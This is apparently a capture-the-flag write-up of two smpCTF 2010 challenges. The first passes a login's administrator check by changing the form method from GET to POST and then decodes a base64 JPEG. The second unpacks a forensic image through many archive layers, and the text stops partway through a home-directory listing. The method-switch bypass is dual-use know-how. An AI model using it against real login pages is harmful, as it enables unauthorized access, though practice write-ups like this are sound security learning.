This challenge was beaten by team member HaP. Here is how he did it. The challenge was:

Retrieve the secret key and decipher it..

Website: http://66.225.157.70:8009/level1

So when you clicked on the link, an authentication box popped up. This was a GET HTML form, which basically said Authenticate with a user name and password box. Enter in some random characters such as “aa” and it brings you to a page that said: “Welcome aa”. If you entered “administrator” it redirected you to a page that said: “Denied”. After playing around with the form a bit, we changed GET to POST and re-submitted with “administrator” as the username and it took you to a page with a lot of encoded characters.. straight away you could tell this was base64:

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
0+4tq7X3HVZq3DtvR9Yqsf6U5+Dbvzb/APz30zx/4bTGsWcbHt4+NZt2bNqmKLdu3TFNNFMeIiIj
xER/s9AAAAAAABhaVpOlaT7v4vTMLA95k15eV7axTb9e/Xx33a+2I7q6uI5qnmZ4jmWaAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//Z

If you took these encoded characters and placed them in a file, you can run it through base64 like so:

[zoidberg@/dev/null:~ ] $ cat secretkey.b64 | base64 -d > picture

[zoidberg@/dev/null:~ ] $ file picture
picture: JPEG image data, JFIF standard 1.01, comment: "Created with GIMP\377"

Oooh, what do we have here? A jpeg image, lets open this up in an image viewer. When I opened it up in GIMP, I got the following text:

Your flag is: smpCTF is the coolest CTF ever!

The jpeg image can be found here. Now we have the flag, we found the Challenge key in the source of the challenge page:

!---Challenge Key: de270765 ---

Yay, that was a nice fun level and an interesting way to hide an image

This was an awesome challenge and my very first crack at forensics. The challenge was simply this:

We are sure we left, a flag in here somewhere... Right redsand?

Can you help find it? The file: download

Looking at the challenge page web source, I instantly found the key:

!--Challenge Key: 74bf0f65--

Then we downloaded the file which was simple called ‘forensic-image’:

[zoidberg@/dev/null:~/SMP/CH4 ] $ file forensic1-image
forensic1-image: rzip compressed data - version 2.1 (15185973 bytes)

So looking at the output of file we know that it is an rzip compressed data file. I had never heard of rzip until I saw this, so time to hit google. I found the following site on google here. I then proceeded to check my distributions package database for the utility ‘rzip’ low and behold the following turned up:

rzip - compression program for large files

I installed it and proceeded to decompress the image file:

[zoidberg@/dev/null:~/SMP/CH4 ] $ mv forensic1-image forensic1-image.rz
[zoidberg@/dev/null:~/SMP/CH4 ] $ rzip -d forensic1-image.rz
[zoidberg@/dev/null:~/SMP/CH4 ] $ ls
total 14832
-rw-r--r-- 1 zoidberg zoidberg 15185973 2010-07-10 00:41 forensic1-image

[zoidberg@/dev/null:~/SMP/CH4 ] $ file forensic1-image
forensic1-image: LHarc 1.x/ARX archive data [lh0]

[zoidberg@/dev/null:~/SMP/CH4 ] $

Rzip allowed me to extract the file. I then checked what the result was, again with the file utility. Which told me that it was an LHarc archive file. Then I proceeded to extract the data:

[zoidberg@/dev/null:~/SMP/CH4 ] $ lha e forensic1-image
FS.tar - Melted : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

[zoidberg@/dev/null:~/SMP/CH4 ] $ ls
total 29664
-rw-r--r-- 1 zoidberg zoidberg 15185973 2010-07-10 00:41 forensic1-image
-rw-r--r-- 1 zoidberg zoidberg 15185920 2010-06-30 02:53 FS.tar

After I extracted the data, I was then left with POSIX tar archive:

[zoidberg@/dev/null:~/SMP/CH4 ] $ file FS.tar
FS.tar: POSIX tar archive (GNU)

[zoidberg@/dev/null:~/SMP/CH4 ] $ tar xvf FS.tar
FS

[zoidberg@/dev/null:~/SMP/CH4 ] $ file FS
FS: bzip2 compressed data, block size = 900k

[zoidberg@/dev/null:~/SMP/CH4 ] $ bunzip2 FS.bz2

[zoidberg@/dev/null:~/SMP/CH4 ] $ ls
total 44476
-rw-r--r-- 1 zoidberg zoidberg 15185973 2010-07-10 00:41 forensic1-image
-rw-r--r-- 1 zoidberg zoidberg 15163583 2010-06-30 02:52 FS
-rw-r--r-- 1 zoidberg zoidberg 15185920 2010-06-30 02:53 FS.tar

I extracted the tar archive, which then gave me a bzip2 archive, I extracted that, and guess what ? Yes, you guessed it, yet another archive:

[zoidberg@/dev/null:~/SMP/CH4 ] $ file FS
FS: gzip compressed data, was "FS", from Unix, last modified: Wed Jun 30 02:42:18 2010, max compression

[zoidberg@/dev/null:~/SMP/CH4 ] $ mv FS FS.gz

[zoidberg@/dev/null:~/SMP/CH4 ] $ gunzip FS.gz

[zoidberg@/dev/null:~/SMP/CH4 ] $ ls
total 93688
-rw-r--r-- 1 zoidberg zoidberg 15185973 2010-07-10 00:41 forensic1-image
-rw-r--r-- 1 zoidberg zoidberg 65560576 2010-06-30 02:52 FS
-rw-r--r-- 1 zoidberg zoidberg 15185920 2010-06-30 02:53 FS.tar

[zoidberg@/dev/null:~/SMP/CH4 ] $ file FS
FS: Linux rev 1.0 ext2 filesystem data, UUID=c8a4643d-d89b-43db-bae8-6192db41dcc1 (large files)

This time it was gzip compressed data file, extracted that and was left with an ext2 file partition… ooohh now we’re getting a little bit more interesting. So I proceeded to mount the ext2 file partition and take a look what was there:

[zoidberg@/dev/null:~/SMP/CH4 ] $ ls
total 93688
-rw-r--r-- 1 zoidberg zoidberg 15185973 2010-07-10 00:41 forensic1-image
-rw-r--r-- 1 zoidberg zoidberg 65560576 2010-06-30 02:52 FS
-rw-r--r-- 1 zoidberg zoidberg 15185920 2010-06-30 02:53 FS.tar

[zoidberg@/dev/null:~/SMP/CH4 ] $ mkdir mnt

[zoidberg@/dev/null:~/SMP/CH4 ] $ sudo mount -t ext2 -o loop FS mnt/

[zoidberg@/dev/null:~/SMP/CH4 ] $ ls
total 93692
-rw-r--r-- 1 zoidberg zoidberg 15185973 2010-07-10 00:41 forensic1-image
-rw-r--r-- 1 zoidberg zoidberg 65560576 2010-06-30 02:52 FS
-rw-r--r-- 1 zoidberg zoidberg 15185920 2010-06-30 02:53 FS.tar
drwxr-xr-x 3 root root 4096 2010-06-30 02:50 mnt

[zoidberg@/dev/null:~/SMP/CH4 ] $ ls mnt/
total 15392
-rw-r--r-- 1 root root 15723366 2010-06-30 02:50 forensic_image
drwx------ 2 root root 16384 2010-06-30 02:42 lost+found

After I mounted the filesystem I was left with yet another forensic_image file, there was nothing in the lost+found directory. So lets investigate this forensic_image:

[zoidberg@/dev/null:/mnt ] $ file forensic_image
forensic_image: data

[zoidberg@/dev/null:~/SMP/CH4/mnt ] $ hexdump -C forensic_image |head
00000000 00 e9 55 43 4c ff 01 1a 00 00 00 01 2d 07 00 04 |..UCL.......-...| <--- UCL!!
00000010 00 00 00 04 00 00 00 04 00 00 6a 6f 65 2f 00 00 |..........joe/..|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 30 |..............00|
00000080 30 30 37 35 35 00 30 30 30 31 37 35 33 00 30 30 |00755.0001753.00|
00000090 30 31 37 35 35 00 30 30 30 30 30 30 30 30 30 30 |01755.0000000000|
000000a0 30 00 31 31 34 31 32 35 31 35 32 30 30 00 30 30 |0.11412515200.00|
000000b0 37 37 34 36 00 20 35 00 00 00 00 00 00 00 00 00 |7746. 5.........|
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|

OK so, it seemed like a data file, checking it with hexdump utility gives us a little hint as to what type of file this is. UCL is a compression library, more information and the tools to enable you to decompress these files are available from here. So lets see whats inside it:

[root@/dev/null:~/SMP/CH4 ] $ ./uclpack -d forensic_image uclunpacked-image

UCL data compression library (v1.03, Jul 20 2004).
Copyright (C) 1996-2004 Markus Franz Xaver Johannes Oberhumer


uclpack: block-size is 262144 bytes
uclpack: decompressed 15723366 into 31989760 bytes

[root@/dev/null:~/SMP/CH4 ] $ ls
total 124940
-rw-r--r-- 1 zoidberg zoidberg 15185973 2010-07-10 00:41 forensic1-image
-rw-r--r-- 1 zoidberg zoidberg 4415 2010-07-13 13:18 forensic-writeup
-rw-r--r-- 1 zoidberg zoidberg 65560576 2010-06-30 02:52 FS
-rw-r--r-- 1 zoidberg zoidberg 15185920 2010-06-30 02:53 FS.tar
drwxr-xr-x 3 root root 4096 2010-06-30 02:50 mnt
-rw-r--r-- 1 root root 31989760 2010-07-13 13:26 uclunpacked-image

[root@/dev/null:~/SMP/CH4 ] $ file uclunpacked-image
uclunpacked-image: POSIX tar archive (GNU)

Ok so, back to another tar archive, lets extract it and see what we have:

[zoidberg@/dev/null:~/FORENSICS ] $ sudo tar xvf uclunpacked-image.tar
joe/
joe/.dbus/
joe/.dbus/session-bus/
joe/.dbus/session-bus/9588dbce1fca58830d10168a4aba6077-2
joe/.dbus/session-bus/9588dbce1fca58830d10168a4aba6077-1
joe/Public/
joe/.bashrc
joe/examples.desktop
joe/.fontconfig/
joe/.fontconfig/10b13308be32295bb2869d1e42a8fb41-x86.cache-2
joe/Downloads/
joe/Downloads/hackerFiles/
joe/Downloads/hackerFiles/ntfs-hidden-data-analysis.pdf
joe/.nautilus/
joe/.xine/
joe/.xine/catalog.cache
joe/.ssh/
joe/.config/
joe/.config/gnome-disk-utility/
joe/.config/gnome-disk-utility/ata-smart-ignore/
joe/.config/compiz/
joe/.config/compiz/compizconfig/
joe/.config/compiz/compizconfig/config
joe/.config/user-dirs.locale
joe/.config/gnome-session/
joe/.config/gnome-session/saved-session/
joe/.config/user-dirs.dirs
joe/.config/gtk-2.0/
joe/.config/gtk-2.0/gtkfilechooser.ini
joe/network_sniff.pcap
joe/.pulse/
joe/.pulse/9588dbce1fca58830d10168a4aba6077-runtime
joe/.pulse/9588dbce1fca58830d10168a4aba6077-stream-volumes.tdb
joe/.pulse/9588dbce1fca58830d10168a4aba6077-device-volumes.tdb
joe/.pulse/9588dbce1fca58830d10168a4aba6077-card-database.tdb
joe/.pulse/9588dbce1fca58830d10168a4aba6077-default-source
joe/.pulse/9588dbce1fca58830d10168a4aba6077-default-sink
joe/.compiz/
joe/.compiz/session/
joe/.compiz/session/1025d49d578b178380127463786965591400000185720025
joe/.compiz/session/10273bd0f849d10abc127465244339743600000011830025
joe/.bash_history
joe/.profile
joe/.gvfs/
joe/.gnupg/
joe/.gnupg/random_seed
joe/.gnupg/pubring.gpg
joe/.gnupg/secring.gpg
joe/.gnupg/pubring.gpg~
joe/.gnupg/trustdb.gpg
joe/.gnupg/gpg.conf
joe/.ICEauthority
joe/JoeHackerPrivate.gpg
joe/.gegl-0.0/
joe/.gegl-0.0/plug-ins/
joe/.gegl-0.0/plug-ins/Makefile
joe/.gegl-0.0/swap/
joe/Music/
joe/.gconf/
joe/.gconf/desktop/
joe/.gconf/desktop/%gconf.xml
joe/.gconf/desktop/gnome/
joe/.gconf/desktop/gnome/peripherals/
joe/.gconf/desktop/gnome/peripherals/keyboard/
joe/.gconf/desktop/gnome/peripherals/keyboard/%gconf.xml
joe/.gconf/desktop/gnome/peripherals/keyboard/kbd/
joe/.gconf/desktop/gnome/peripherals/keyboard/kbd/%gconf.xml
joe/.gconf/desktop/gnome/peripherals/%gconf.xml
joe/.gconf/desktop/gnome/peripherals/touchpad/
joe/.gconf/desktop/gnome/peripherals/touchpad/%gconf.xml
joe/.gconf/desktop/gnome/accessibility/
joe/.gconf/desktop/gnome/accessibility/keyboard/
joe/.gconf/desktop/gnome/accessibility/keyboard/%gconf.xml
joe/.gconf/desktop/gnome/accessibility/%gconf.xml
joe/.gconf/desktop/gnome/applications/
joe/.gconf/desktop/gnome/applications/%gconf.xml
joe/.gconf/desktop/gnome/applications/window_manager/
joe/.gconf/desktop/gnome/applications/window_manager/%gconf.xml
joe/.gconf/desktop/gnome/%gconf.xml
joe/.gconf/apps/
joe/.gconf/apps/gnome-terminal/
joe/.gconf/apps/gnome-terminal/%gconf.xml
joe/.gconf/apps/gnome-terminal/profiles/
joe/.gconf/apps/gnome-terminal/profiles/Default/
joe/.gconf/apps/gnome-terminal/profiles/Default/%gconf.xml
joe/.gconf/apps/gnome-terminal/profiles/%gconf.xml
joe/.gconf/apps/gedit-2/
joe/.gconf/apps/gedit-2/%gconf.xml
joe/.gconf/apps/gedit-2/preferences/
joe/.gconf/apps/gedit-2/preferences/%gconf.xml
joe/.gconf/apps/gedit-2/preferences/ui/
joe/.gconf/apps/gedit-2/preferences/ui/statusbar/
joe/.gconf/apps/gedit-2/preferences/ui/statusbar/%gconf.xml
joe/.gconf/apps/gedit-2/preferences/ui/%gconf.xml
joe/.gconf/apps/gedit-2/plugins/
joe/.gconf/apps/gedit-2/plugins/filebrowser/
joe/.gconf/apps/gedit-2/plugins/filebrowser/%gconf.xml
joe/.gconf/apps/gedit-2/plugins/filebrowser/on_load/
joe/.gconf/apps/gedit-2/plugins/filebrowser/on_load/%gconf.xml
joe/.gconf/apps/gedit-2/plugins/%gconf.xml
joe/.gconf/apps/compiz/
joe/.gconf/apps/compiz/general/
joe/.gconf/apps/compiz/general/allscreens/
joe/.gconf/apps/compiz/general/allscreens/%gconf.xml
joe/.gconf/apps/compiz/general/allscreens/options/
joe/.gconf/apps/compiz/general/allscreens/options/%gconf.xml
joe/.gconf/apps/compiz/general/%gconf.xml
joe/.gconf/apps/compiz/%gconf.xml
joe/.gconf/apps/nautilus/
joe/.gconf/apps/nautilus/desktop-metadata/
joe/.gconf/apps/nautilus/desktop-metadata/%gconf.xml
joe/.gconf/apps/nautilus/desktop-metadata/directory/
joe/.gconf/apps/nautilus/desktop-metadata/directory/%gconf.xml
joe/.gconf/apps/nautilus/%gconf.xml
